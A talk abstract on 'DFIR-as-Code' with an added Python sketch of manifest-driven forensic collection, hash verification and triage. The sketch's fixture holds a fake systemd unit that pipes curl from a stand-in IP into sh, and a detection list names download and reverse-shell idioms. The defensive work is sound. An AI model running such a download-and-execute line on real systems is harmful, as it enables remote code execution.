DFIR-as-Code: Scaling Incident Response Beyond Human Limits
OVERVIEW
Incident response is still broken. We treat DFIR as an unpredictable, ad-hoc fire drill: manual evidence collection, inconsistent analysis, and wheels re-invented on every investigation. It is time to evolve. DFIR-as-Code is the missing framework: a paved path for automating forensic data collection, enrichment, and triage. This talk breaks down how to apply infrastructure-as-code (IaC) principles to DFIR, predefine secondary collection mechanisms ahead of time rather than improvising them mid-incident, and map out an extended incident response lifecycle that ensures repeatability, speed, and accuracy. Whether you are hunting for adversaries in memory, uncovering new persistence mechanisms, or automating forensic pipelines, this session shows how to shift DFIR from chaos to code, at scale.
Some DFIR-as-Code concepts are already in use in large environments where scale rules out doing things manually. This talk provides a framework for evolving how DFIR is performed today from art into science. By borrowing IaC concepts that have already proven themselves and applying them to the continually evolving DFIR landscape, defenders can continually improve threat detection and decrease response time across many facets of the incident response lifecycle.
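As an added illustration of the idea, and not code from the talk or from any tool it describes, the Python sketch below treats collection as code: a declarative manifest names the artifacts to gather, the collector copies and hashes each match into an evidence directory, a verify step re-hashes the copies to detect post-collection tampering, and a codified triage rule flags download-and-execute idioms. The manifest, artifact paths, sample host contents, and suspicious-token list are all constructed for the example.

```python
"""Added DFIR-as-Code example: manifest-driven collection, hashed evidence,
verification that catches tampering, and a triage rule expressed as code."""
import hashlib
import json
import shutil
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Hypothetical manifest in IaC style: declares WHAT to collect, not HOW.
# Globs are relative to the host root being triaged (mounted image, live
# root, or a bundle pulled by an EDR agent).
COLLECTION_MANIFEST = {
    "name": "linux-persistence-triage",
    "version": 1,
    "artifacts": [
        {"id": "cron", "globs": ["etc/crontab", "etc/cron.d/*"]},
        {"id": "systemd-units", "globs": ["etc/systemd/system/*.service"]},
        {"id": "shell-rc", "globs": ["root/.bashrc"]},
    ],
}
# Constructed triage rule: idioms common in download-and-execute or
# reverse-shell persistence. Real rule sets would be versioned with the manifest.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "base64 -d", "/dev/tcp/")


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def collect(host_root: Path, out_dir: Path, manifest: dict) -> dict:
    """Copy each artifact the manifest matches into out_dir and return an
    evidence record with a SHA-256 per file. Sorted globbing keeps runs comparable."""
    records = []
    for artifact in manifest["artifacts"]:
        for pattern in artifact["globs"]:
            for src in sorted(host_root.glob(pattern)):
                if not src.is_file():
                    continue
                rel = src.relative_to(host_root)
                dst = out_dir / artifact["id"] / rel
                dst.parent.mkdir(parents=True, exist_ok=True)
                shutil.copy2(src, dst)  # copy2 preserves mtime, useful for timelines
                records.append({"artifact": artifact["id"], "source": str(rel),
                                "sha256": sha256_file(dst), "size": dst.stat().st_size})
    return {"manifest": manifest["name"], "manifest_version": manifest["version"],
            "collected_at": datetime.now(timezone.utc).isoformat(), "files": records}


def verify(out_dir: Path, evidence: dict) -> bool:
    """Re-hash every collected copy; a missing file or mismatch means the
    evidence set changed after collection."""
    for r in evidence["files"]:
        p = out_dir / r["artifact"] / r["source"]
        if not p.is_file() or sha256_file(p) != r["sha256"]:
            return False
    return True


def triage(out_dir: Path, evidence: dict) -> list:
    """Codified triage: source paths whose content contains a suspicious token,
    so the identical rule runs on every host instead of an analyst's memory."""
    flagged = []
    for r in evidence["files"]:
        text = (out_dir / r["artifact"] / r["source"]).read_text(errors="replace")
        if any(tok in text for tok in SUSPICIOUS_TOKENS):
            flagged.append(r["source"])
    return sorted(flagged)


def build_sample_host() -> Path:
    """Constructed fake host root (not from a real system): benign cron jobs
    and shell rc, plus one systemd unit that pipes curl into sh."""
    root = Path(tempfile.mkdtemp(prefix="dfir-host-"))
    (root / "etc/cron.d").mkdir(parents=True)
    (root / "etc/systemd/system").mkdir(parents=True)
    (root / "root").mkdir()
    (root / "etc/crontab").write_text("0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n")
    (root / "etc/cron.d/backup").write_text("@daily root /opt/backup.sh\n")
    (root / "root/.bashrc").write_text("export PS1='\\u@\\h:\\w\\$ '\n")
    (root / "etc/systemd/system/update.service").write_text(
        "[Service]\nExecStart=/bin/sh -c 'curl -s http://198.51.100.7/x | sh'\n")
    return root


def run_pipeline(host_root: Path) -> dict:
    """Collect, write evidence.json beside the copies, then verify and triage."""
    out = Path(tempfile.mkdtemp(prefix="dfir-evidence-"))
    evidence = collect(host_root, out, COLLECTION_MANIFEST)
    (out / "evidence.json").write_text(json.dumps(evidence, indent=2))
    return {"evidence_dir": str(out), "evidence": evidence,
            "verified": verify(out, evidence), "flagged": triage(out, evidence)}


def tamper_then_verify(result: dict) -> bool:
    """Failure mode: overwrite one collected copy and re-verify (expect False)."""
    out = Path(result["evidence_dir"])
    first = result["evidence"]["files"][0]
    (out / first["artifact"] / first["source"]).write_text("altered after collection\n")
    return verify(out, result["evidence"])


if __name__ == "__main__":
    res = run_pipeline(build_sample_host())
    print(json.dumps({k: res[k] for k in ("verified", "flagged")}, indent=2))
    print("verify after tampering:", tamper_then_verify(res))
```

The point is the shape, not the rule set: the manifest and the triage tokens are data that can be reviewed, versioned and rolled out like any other IaC artifact, the collector is deterministic, and the hash manifest lets a second analyst (or a later stage of the pipeline) prove the evidence has not changed since it was gathered.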